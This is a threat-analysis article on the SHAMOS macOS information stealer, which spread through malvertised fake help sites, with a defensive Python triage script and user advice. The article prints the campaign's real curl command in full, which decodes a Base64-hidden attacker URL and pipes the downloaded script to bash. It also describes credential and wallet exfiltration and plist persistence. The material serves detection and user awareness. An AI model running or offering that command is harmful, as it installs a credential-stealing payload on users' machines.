Between June and August 2025, a sophisticated malware campaign actively targeted macOS users, compromising over 300 customer environments through deceptive help websites. This operation introduced SHAMOS, a variant of the notorious Atomic macOS Stealer (AMOS), developed by the cybercriminal group COOKIE SPIDER. COOKIE SPIDER operates the information stealer as malware-as-a-service, renting it out to other cybercriminals.
Attack Vector: Deceptive Help Websites
The attack begins when users search for common macOS troubleshooting solutions, such as “macOS flush resolver cache”, and encounter promoted malvertising websites in their search results. These fraudulent sites, including mac-safer.com and rescue-mac.com, masquerade as legitimate technical support resources while harboring malicious intent. The campaign has targeted users across multiple countries, including the United States, United Kingdom, Japan, China, Colombia, Canada, Mexico, and Italy, notably excluding Russia, since Russian eCrime forums prohibit targeting Commonwealth of Independent States (CIS) countries.
Infection Mechanism and Technical Implementation
The malware’s infection mechanism relies on a cleverly disguised terminal command that victims unknowingly execute:
```bash
curl -fsSL $ (echo aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo | base64 -d) | bash
```
This command performs several operations in sequence. First, it decodes the Base64-encoded string to reveal the URL https://icloudservers.com/gm/install[.]sh, then it downloads a Bash script from that malicious server and pipes it directly into bash for execution. The script captures the user’s password and subsequently downloads the SHAMOS Mach-O executable from https://icloudservers.com/gm/update.
Once installed in the /tmp/ directory, SHAMOS employs multiple evasion techniques to avoid detection. The malware removes extended file attributes using xattr commands to bypass macOS Gatekeeper security checks, assigns executable permissions through chmod, and conducts anti-virtual machine checks to ensure it is not operating within a security sandbox environment. The stealer then executes various AppleScript commands for comprehensive host reconnaissance and data collection.
SHAMOS specifically targets cryptocurrency wallet files, sensitive credential databases, Keychain data, AppleNotes content, and browser-stored information. The malware packages stolen data into a ZIP archive named out.zip and exfiltrates it using curl commands to remote servers. Additionally, SHAMOS establishes persistence through a Plist file named com[.]finder[.]helper[.]plist saved to the User’s LaunchDaemons directory when sudo privileges are available.
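As an added defender-side example (not code from the original report), the following Python triage script covers the two observable artifacts described above: it decodes Base64 tokens found in a command line to surface the hidden URL in defanged form and flags the “decode inline, then pipe to a shell” pattern, and it checks a list of LaunchDaemons plist paths for the persistence file name the report gives. The command lines and paths it scans are constructed samples embedded in the script; `example.invalid` is a placeholder host, not the campaign’s infrastructure.

```python
import base64
import re

# A token long enough to hold a Base64-encoded URL.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# An inline decode (`base64 -d`, `-D` or `--decode`) inside $(...) or backticks.
INLINE_DECODE = re.compile(r"(\$\(|`)[^`)]*base64\s+(-d|-D|--decode)")
# Output piped into an interpreter at the end of the command line.
PIPE_TO_SHELL = re.compile(r"\|\s*(bash|sh|zsh)\s*$")

# Persistence file name reported for SHAMOS (from the report above).
KNOWN_PERSISTENCE_NAME = "com.finder.helper.plist"

# Constructed sample command lines (not real telemetry). The first mirrors the
# curl | base64 -d | bash pattern with a placeholder URL; the others are benign.
_PLACEHOLDER_URL = "https://example.invalid/install.sh"
_B64_PLACEHOLDER = base64.b64encode(_PLACEHOLDER_URL.encode()).decode()
SAMPLE_COMMAND_LINES = [
    f"curl -fsSL $(echo {_B64_PLACEHOLDER} | base64 -d) | bash",
    "curl -fsSL https://brew.sh/install.sh -o /tmp/install.sh",
    "echo aGVsbG8= | base64 -d",
]

# Constructed sample plist paths (not from a real host).
SAMPLE_PLIST_PATHS = [
    "/Library/LaunchDaemons/com.finder.helper.plist",
    "/Library/LaunchDaemons/com.apple.example.plist",
    "/Users/alice/Library/LaunchDaemons/com.finder.helper.plist",
    "/Users/alice/Library/LaunchAgents/com.finder.helper.plist",
]


def decode_embedded_urls(cmdline):
    """Return defanged http(s) URLs hidden in Base64 tokens of a command line."""
    urls = []
    for token in B64_TOKEN.findall(cmdline):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text: ignore
        if text.startswith(("http://", "https://")):
            urls.append(text.replace(".", "[.]"))  # defang for safe reporting
    return urls


def classify(cmdline):
    """Classify one command line; returns (verdict, decoded_urls)."""
    urls = decode_embedded_urls(cmdline)
    if INLINE_DECODE.search(cmdline) and PIPE_TO_SHELL.search(cmdline):
        return ("suspicious: base64-decoded content piped to shell", urls)
    if "curl" in cmdline and PIPE_TO_SHELL.search(cmdline):
        return ("review: remote script piped to shell", urls)
    return ("benign", urls)


def flag_persistence(paths):
    """Return LaunchDaemons plist paths whose file name matches the reported one."""
    return [
        p for p in paths
        if "/LaunchDaemons/" in p and p.rsplit("/", 1)[-1] == KNOWN_PERSISTENCE_NAME
    ]


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        verdict, urls = classify(line)
        print(f"{verdict:55} urls={urls}  <- {line}")
    for path in flag_persistence(SAMPLE_PLIST_PATHS):
        print(f"persistence indicator: {path}")
```

The decoder reports URLs defanged so that a triage note or ticket never contains a clickable link to attacker infrastructure; the persistence check is deliberately narrow (exact file name under a LaunchDaemons directory) so it does not flag Apple’s own daemons.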
Broader Context: Evolution of macOS Malware
The emergence of SHAMOS underscores a broader trend in the evolution of macOS malware. Historically, macOS was considered relatively secure compared to other operating systems. However, the increasing popularity of Apple devices has made them attractive targets for cybercriminals.
One notable predecessor to SHAMOS is the Shlayer Trojan, first identified in 2018. Shlayer was distributed through fake Adobe Flash Player updates and was capable of bypassing macOS security measures. It primarily served as a dropper for adware and other unwanted applications. By 2019, Shlayer had become the most widespread macOS threat, accounting for nearly 30% of all attacks on the platform.
The tactics employed by SHAMOS, such as using deceptive help websites and sophisticated social engineering, represent an evolution from earlier methods. These strategies exploit users’ trust in legitimate-looking resources and their willingness to follow technical instructions to resolve issues.
Implications for macOS Users
The SHAMOS campaign highlights several critical implications for macOS users:
1. Increased Sophistication of Attacks: Cybercriminals are employing more advanced techniques, including social engineering and obfuscation, to bypass security measures and deceive users.
2. Targeting of Sensitive Information: The focus on stealing credentials, cryptocurrency wallets, and other sensitive data indicates a shift towards more financially motivated attacks.
3. Global Reach: The widespread targeting across multiple countries demonstrates the global nature of the threat and the need for international cooperation in cybersecurity efforts.
Recommendations for macOS Users
To mitigate the risk posed by SHAMOS and similar malware, macOS users should adopt the following practices:
1. Exercise Caution with Online Resources: Be wary of websites offering technical support or software downloads, especially those encountered through search engine results.
2. Verify Commands Before Execution: Avoid executing terminal commands from unverified sources. Always cross-reference instructions with official documentation or trusted forums.
3. Keep Software Updated: Regularly update macOS and all installed applications to ensure the latest security patches are applied.
4. Use Reputable Security Software: Install and maintain reputable antivirus and anti-malware software to detect and prevent infections.
5. Educate Yourself on Phishing and Social Engineering: Stay informed about common phishing tactics and social engineering methods to recognize and avoid potential threats.
Conclusion
The SHAMOS malware campaign serves as a stark reminder of the evolving threats facing macOS users. By understanding the tactics employed by cybercriminals and adopting proactive security measures, users can better protect themselves against such sophisticated attacks.